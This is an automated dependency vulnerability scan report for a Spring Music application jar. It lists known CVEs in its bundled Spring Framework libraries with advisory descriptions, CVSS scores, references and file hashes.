OSSINDEX - [CVE-2018-11039] CWE-noinfo OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-11039 OSSIndex - https://jira.spring.io/browse/SPR-16836 OSSIndex - https://pivotal.io/security/cve-2018-11039 af854a3a-2127-422b-91ae-364da2661108 - BROKEN_LINK,THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MITIGATION,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - BROKEN_LINK,THIRD_PARTY_ADVISORY,VDB_ENTRY security_alert@emc.com - MAILING_LIST,THIRD_PARTY_ADVISORY security_alert@emc.com - MITIGATION,VENDOR_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2024-38808 (OSSINDEX) suppress
In Spring Framework versions 5.3.0 - 5.3.38 and older unsupported versions, it is possible for a user to provide a specially crafted Spring Expression Language (SpEL) expression that may cause a denial of service (DoS) condition.
Specifically, an application is vulnerable when the following is true:
* The application evaluates user-supplied SpEL expressions.
Sonatype's research suggests that this CVE's details differ from those defined at NVD. See https://ossindex.sonatype.org/vulnerability/CVE-2024-38808 for details CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv2:
Base Score: MEDIUM (5.300000190734863) Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:org.springframework:spring-expression:5.0.5.RELEASE:*:*:*:*:*:*:* CVE-2022-22968 suppress
In Spring Framework versions 5.3.0 - 5.3.18, 5.2.0 - 5.2.20, and older unsupported versions, the patterns for disallowedFields on a DataBinder are case sensitive which means a field is not effectively protected unless it is listed with both upper and lower case for the first character of the field, including upper and lower case for the first character of all nested fields within the property path. CWE-178 Improper Handling of Case Sensitivity
CVSSv3:
Base Score: MEDIUM (5.3) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:P/A:N References:
Vulnerable Software & Versions: (show all )
CVE-2022-22970 suppress
In spring framework versions prior to 5.3.20+ , 5.2.22+ and old unsupported versions, applications that handle file uploads are vulnerable to DoS attack if they rely on data binding to set a MultipartFile or javax.servlet.Part to a field in a model object. CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv3:
Base Score: MEDIUM (5.3) Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H/E:1.6/RC:R/MAV:A CVSSv2:
Base Score: LOW (3.5) Vector: /AV:N/AC:M/Au:S/C:N/I:N/A:P References:
Vulnerable Software & Versions: (show all )
spring-music-sqldb-1.0.jar: spring-web-5.0.5.RELEASE.jarDescription:
Spring Web License:
Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0 File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/spring-web-5.0.5.RELEASE.jar
MD5: de6aff2fbceef7fdcafe9e1cc1245c0a
SHA1: d51dbb5cabe72ae02e400577bac48f7fc94088de
SHA256: 810373a45d353a52978b132fa0da4f954b6d05d78a4b7e4de25c9d2bcf64840b
Evidence Type Source Name Value Confidence Vendor central artifactid spring-web Highest Vendor central groupid org.springframework Highest Vendor file name spring-web High Vendor hint analyzer vendor pivotal software Highest Vendor hint analyzer vendor SpringSource Highest Vendor hint analyzer vendor vmware Highest Vendor jar package name springframework Low Vendor jar package name web Highest Vendor jar package name web Low Vendor Manifest automatic-module-name spring.web Medium Vendor pom artifactid spring-web Low Vendor pom developer email jhoeller@pivotal.io Low Vendor pom developer id jhoeller Medium Vendor pom developer name Juergen Hoeller Medium Vendor pom groupid org.springframework Highest Vendor pom name Spring Web High Vendor pom organization name Spring IO High Vendor pom organization url http://projects.spring.io/spring-framework Medium Vendor pom url spring-projects/spring-framework Highest Product central artifactid spring-web Highest Product file name spring-web High Product hint analyzer product springsource_spring_framework Highest Product jar package name web Highest Product jar package name web Low Product Manifest automatic-module-name spring.web Medium Product Manifest Implementation-Title spring-web High Product pom artifactid spring-web Highest Product pom developer email jhoeller@pivotal.io Low Product pom developer id jhoeller Low Product pom developer name Juergen Hoeller Low Product pom groupid org.springframework Highest Product pom name Spring Web High Product pom organization name Spring IO Low Product pom organization url http://projects.spring.io/spring-framework Low Product pom url spring-projects/spring-framework High Version central version 5.0.5.RELEASE Highest Version Manifest Implementation-Version 5.0.5.RELEASE High Version pom version 5.0.5.RELEASE Highest
CVE-2016-1000027 suppress
Pivotal Spring Framework through 5.3.16 suffers from a potential remote code execution (RCE) issue if used for Java deserialization of untrusted data. Depending on how the library is implemented within a product, this issue may or not occur, and authentication may be required. NOTE: the vendor's position is that untrusted data is not an intended use case. The product's behavior will not be changed because some users rely on deserialization of trusted data. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P References:
OSSINDEX - [CVE-2016-1000027] CWE-502: Deserialization of Untrusted Data OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-1000027 OSSIndex - https://blog.gypsyengineer.com/en/security/detecting-dangerous-spring-exporters-with-codeql.html OSSIndex - https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2016-1000027 OSSIndex - https://github.com/spring-projects/spring-framework/issues/24434 OSSIndex - https://www.tenable.com/security/research/tra-2016-20 af854a3a-2127-422b-91ae-364da2661108 - BROKEN_LINK,EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - RELEASE_NOTES,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - BROKEN_LINK,EXPLOIT,THIRD_PARTY_ADVISORY cve@mitre.org - EXPLOIT,THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,THIRD_PARTY_ADVISORY cve@mitre.org - RELEASE_NOTES,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions:
CVE-2022-22965 suppress
CISA Known Exploited Vulnerability: Product: VMware Spring Framework Name: Spring Framework JDK 9+ Remote Code Execution Vulnerability Date Added: 2022-04-04 Description: Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. Required Action: Apply updates per vendor instructions. Due Date: 2022-04-25 Notes: https://nvd.nist.gov/vuln/detail/CVE-2022-22965
A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it. CWE-94 Improper Control of Generation of Code ('Code Injection')
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - MITIGATION,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - US_GOVERNMENT_RESOURCE security@vmware.com - EXPLOIT,THIRD_PARTY_ADVISORY,VDB_ENTRY security@vmware.com - MITIGATION,VENDOR_ADVISORY security@vmware.com - PATCH,THIRD_PARTY_ADVISORY security@vmware.com - PATCH,THIRD_PARTY_ADVISORY security@vmware.com - THIRD_PARTY_ADVISORY security@vmware.com - THIRD_PARTY_ADVISORY security@vmware.com - THIRD_PARTY_ADVISORY security@vmware.com - THIRD_PARTY_ADVISORY,VDB_ENTRY Vulnerable Software & Versions: (show all )
CVE-2018-1258 suppress
Spring Framework version 5.0.5 when used in combination with any versions of Spring Security contains an authorization bypass when using method security. An unauthorized malicious user can gain unauthorized access to methods that should be restricted. CWE-863 Incorrect Authorization
CVSSv3:
Base Score: HIGH (8.8) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (6.5) Vector: /AV:N/AC:L/Au:S/C:P/I:P/A:P References:
OSSINDEX - [CVE-2018-1258] CWE-863: Incorrect Authorization OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-1258 OSSIndex - https://jira.spring.io/browse/SPR-16757 OSSIndex - https://pivotal.io/security/cve-2018-1258 af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - THIRD_PARTY_ADVISORY security_alert@emc.com - THIRD_PARTY_ADVISORY,VDB_ENTRY security_alert@emc.com - THIRD_PARTY_ADVISORY,VDB_ENTRY security_alert@emc.com - THIRD_PARTY_ADVISORY,VDB_ENTRY security_alert@emc.com - VENDOR_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2024-38809 (OSSINDEX) suppress
Applications that parse ETags from "If-Match" or "If-None-Match" request headers are vulnerable to DoS attack.
Users of affected versions should upgrade to the corresponding fixed version.
Users of older, unsupported versions could enforce a size limit on "If-Match" and "If-None-Match" headers, e.g. through a Filter. CWE-400 Uncontrolled Resource Consumption
CVSSv2:
Base Score: HIGH (8.699999809265137) Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:org.springframework:spring-web:5.0.5.RELEASE:*:*:*:*:*:*:* CVE-2024-22243 (OSSINDEX) suppress
Applications that use UriComponentsBuilder to parse an externally provided URL (e.g. through a query parameter) AND perform validation checks on the host of the parsed URL may be vulnerable to a open redirect https://cwe.mitre.org/data/definitions/601.html attack or to a SSRF attack if the URL is used after passing validation checks.
Sonatype's research suggests that this CVE's details differ from those defined at NVD. See https://ossindex.sonatype.org/vulnerability/CVE-2024-22243 for details CWE-601 URL Redirection to Untrusted Site ('Open Redirect')
CVSSv3:
Base Score: HIGH (8.100000381469727) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:org.springframework:spring-web:5.0.5.RELEASE:*:*:*:*:*:*:* CVE-2024-22262 (OSSINDEX) suppress
Applications that use UriComponentsBuilder to parse an externally provided URL (e.g. through a query parameter) AND perform validation checks on the host of the parsed URL may be vulnerable to a open redirect https://cwe.mitre.org/data/definitions/601.html attack or to a SSRF attack if the URL is used after passing validation checks.
This is the same as CVE-2024-22259 https://spring.io/security/cve-2024-22259 and CVE-2024-22243 https://spring.io/security/cve-2024-22243 , but with different input. CWE-601 URL Redirection to Untrusted Site ('Open Redirect')
CVSSv3:
Base Score: HIGH (8.100000381469727) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:org.springframework:spring-web:5.0.5.RELEASE:*:*:*:*:*:*:* CVE-2024-22259 suppress
Applications that use UriComponentsBuilder in Spring Framework to parse an externally provided URL (e.g. through a query parameter) AND perform validation checks on the host of the parsed URL may be vulnerable to a open redirect https://cwe.mitre.org/data/definitions/601.html attack or to a SSRF attack if the URL is used after passing validation checks.
This is the same as CVE-2024-22243 https://spring.io/security/cve-2024-22243 , but with different input. CWE-601 URL Redirection to Untrusted Site ('Open Redirect')
CVSSv3:
Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N/E:2.8/RC:R/MAV:A References:
Vulnerable Software & Versions: (show all )
CVE-2021-22118 (OSSINDEX) suppress
In Spring Framework, versions 5.2.x prior to 5.2.15 and versions 5.3.x prior to 5.3.7, a WebFlux application is vulnerable to a privilege escalation: by (re)creating the temporary storage directory, a locally authenticated malicious user can read or modify files that have been uploaded to the WebFlux application, or overwrite arbitrary files with multipart request data.
Sonatype's research suggests that this CVE's details differ from those defined at NVD. See https://ossindex.sonatype.org/vulnerability/CVE-2021-22118 for details CWE-269 Improper Privilege Management
CVSSv3:
Base Score: HIGH (7.800000190734863) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:org.springframework:spring-web:5.0.5.RELEASE:*:*:*:*:*:*:* CVE-2018-11040 suppress
Spring Framework, versions 5.0.x prior to 5.0.7 and 4.3.x prior to 4.3.18 and older unsupported versions, allows web applications to enable cross-domain requests via JSONP (JSON with Padding) through AbstractJsonpResponseBodyAdvice for REST controllers and MappingJackson2JsonView for browser requests. Both are not enabled by default in Spring Framework nor Spring Boot, however, when MappingJackson2JsonView is configured in an application, JSONP support is automatically ready to use through the "jsonp" and "callback" JSONP parameters, enabling cross-domain requests. CWE-829 Inclusion of Functionality from Untrusted Control Sphere
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:P/I:N/A:N References:
OSSINDEX - [CVE-2018-11040] CWE-829: Inclusion of Functionality from Untrusted Control Sphere OSSINDEX - [CVE-2018-11040] CWE-829: Inclusion of Functionality from Untrusted Control Sphere OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-11040 OSSIndex - https://jira.spring.io/browse/SPR-16798 OSSIndex - https://pivotal.io/security/cve-2018-11040 af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MITIGATION,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - MAILING_LIST,THIRD_PARTY_ADVISORY security_alert@emc.com - MITIGATION,VENDOR_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2018-15756 suppress
Spring Framework, version 5.1, versions 5.0.x prior to 5.0.10, versions 4.3.x prior to 4.3.20, and older unsupported versions on the 4.2.x branch provide support for range requests when serving static resources through the ResourceHttpRequestHandler, or starting in 5.0 when an annotated controller returns an org.springframework.core.io.Resource. A malicious user (or attacker) can add a range header with a high number of ranges, or with wide ranges that overlap, or both, for a denial of service attack. This vulnerability affects applications that depend on either spring-webmvc or spring-webflux. Such applications must also have a registration for serving static resources (e.g. JS, CSS, images, and others), or have an annotated controller that returns an org.springframework.core.io.Resource. Spring Boot applications that depend on spring-boot-starter-web or spring-boot-starter-webflux are ready to serve static resources out of the box and are therefore vulnerable. NVD-CWE-noinfo
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P References:
OSSINDEX - [CVE-2018-15756] CWE-noinfo OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-15756 OSSIndex - https://pivotal.io/security/cve-2018-15756 af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - NOT_APPLICABLE,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,URL_REPURPOSED,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY security_alert@emc.com - MAILING_LIST,THIRD_PARTY_ADVISORY security_alert@emc.com - NOT_APPLICABLE,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - THIRD_PARTY_ADVISORY security_alert@emc.com - THIRD_PARTY_ADVISORY,URL_REPURPOSED,VDB_ENTRY security_alert@emc.com - VENDOR_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-5398 suppress
In Spring Framework, versions 5.2.x prior to 5.2.3, versions 5.1.x prior to 5.1.13, and versions 5.0.x prior to 5.0.16, an application is vulnerable to a reflected file download (RFD) attack when it sets a "Content-Disposition" header in the response where the filename attribute is derived from user supplied input. CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'), CWE-494 Download of Code Without Integrity Check
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H/E:1.6/RC:R/MAV:A CVSSv2:
Base Score: HIGH (7.6) Vector: /AV:N/AC:H/Au:N/C:C/I:C/A:C References:
Vulnerable Software & Versions: (show all )
CVE-2025-41234 (OSSINDEX) suppress
Description
In Spring Framework, versions 6.0.x as of 6.0.5, versions 6.1.x and 6.2.x, an application is vulnerable to a reflected file download (RFD) attack when it sets a “Content-Disposition” header with a non-ASCII charset, where the filename attribute is derived from user-supplied input.
Specifically, an application is vulnerable when all the following are true:
* The header is prepared with org.springframework.http.ContentDisposition.
* The filename is set via ContentDisposition.Builder#filename(String, Charset).
* The value for the filename is derived from user-supplied input.
* The application does not sanitize the user-supplied input.
* The downloaded content of the response is injected with malicious commands by the attacker (see RFD paper reference for details).
An application is not vulnerable if any of the following is true:
* The application does not set a “Content-Disposition” response header.
* The header is not prepared with org.springframework.http.ContentDisposition.
* The filename is set via one of: * ContentDisposition.Builder#filename(String), or
* ContentDisposition.Builder#filename(String, ASCII)
* The filename is not derived from user-supplied input.
* The filename is derived from user-supplied input but sanitized by the application.
* The attacker cannot inject malicious content in the downloaded content of the response.
Affected Spring Products and VersionsSpring Framework:
* 6.2.0 - 6.2.7
* 6.1.0 - 6.1.20
* 6.0.5 - 6.0.28
* Older, unsupported versions are not affected
MitigationUsers of affected versions should upgrade to the corresponding fixed version.
Affected version(s)Fix versionAvailability6.2.x6.2.8OSS6.1.x6.1.21OSS6.0.x6.0.29 Commercial https://enterprise.spring.io/ No further mitigation steps are necessary.
CWE-113 in `Content-Disposition` handling in VMware Spring Framework versions 6.0.5 to 6.2.7 allows remote attackers to launch Reflected File Download (RFD) attacks via unsanitized user input in `ContentDisposition.Builder#filename(String, Charset)` with non-ASCII charsets.
Sonatype's research suggests that this CVE's details differ from those defined at NVD. See https://ossindex.sonatype.org/vulnerability/CVE-2025-41234 for details CWE-113 Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting')
CVSSv2:
Base Score: HIGH (7.400000095367432) Vector: CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:A/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:org.springframework:spring-web:5.0.5.RELEASE:*:*:*:*:*:*:* CVE-2024-38828 (OSSINDEX) suppress
Spring MVC controller methods with an @RequestBody byte[] method parameter are vulnerable to a DoS attack. CWE-400 Uncontrolled Resource Consumption
CVSSv2:
Base Score: MEDIUM (6.900000095367432) Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:org.springframework:spring-web:5.0.5.RELEASE:*:*:*:*:*:*:* CVE-2018-1257 suppress
Spring Framework, versions 5.0.x prior to 5.0.6, versions 4.3.x prior to 4.3.17, and older unsupported versions allows applications to expose STOMP over WebSocket endpoints with a simple, in-memory STOMP broker through the spring-messaging module. A malicious user (or attacker) can craft a message to the broker that can lead to a regular expression, denial of service attack. NVD-CWE-noinfo
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.0) Vector: /AV:N/AC:L/Au:S/C:N/I:N/A:P References:
OSSINDEX - [CVE-2018-1257] CWE-noinfo OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-1257 OSSIndex - https://jira.spring.io/browse/SPR-16731 OSSIndex - https://pivotal.io/security/cve-2018-1257 af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - VENDOR_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - PATCH,THIRD_PARTY_ADVISORY security_alert@emc.com - THIRD_PARTY_ADVISORY security_alert@emc.com - THIRD_PARTY_ADVISORY security_alert@emc.com - THIRD_PARTY_ADVISORY,VDB_ENTRY security_alert@emc.com - VENDOR_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2020-5421 suppress
In Spring Framework versions 5.2.0 - 5.2.8, 5.1.0 - 5.1.17, 5.0.0 - 5.0.18, 4.3.0 - 4.3.28, and older unsupported versions, the protections against RFD attacks from CVE-2015-5211 may be bypassed depending on the browser used through the use of a jsessionid path parameter. NVD-CWE-noinfo
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:H/A:N/E:1.3/RC:R/MAV:A CVSSv2:
Base Score: LOW (3.6) Vector: /AV:N/AC:H/Au:S/C:P/I:P/A:N References:
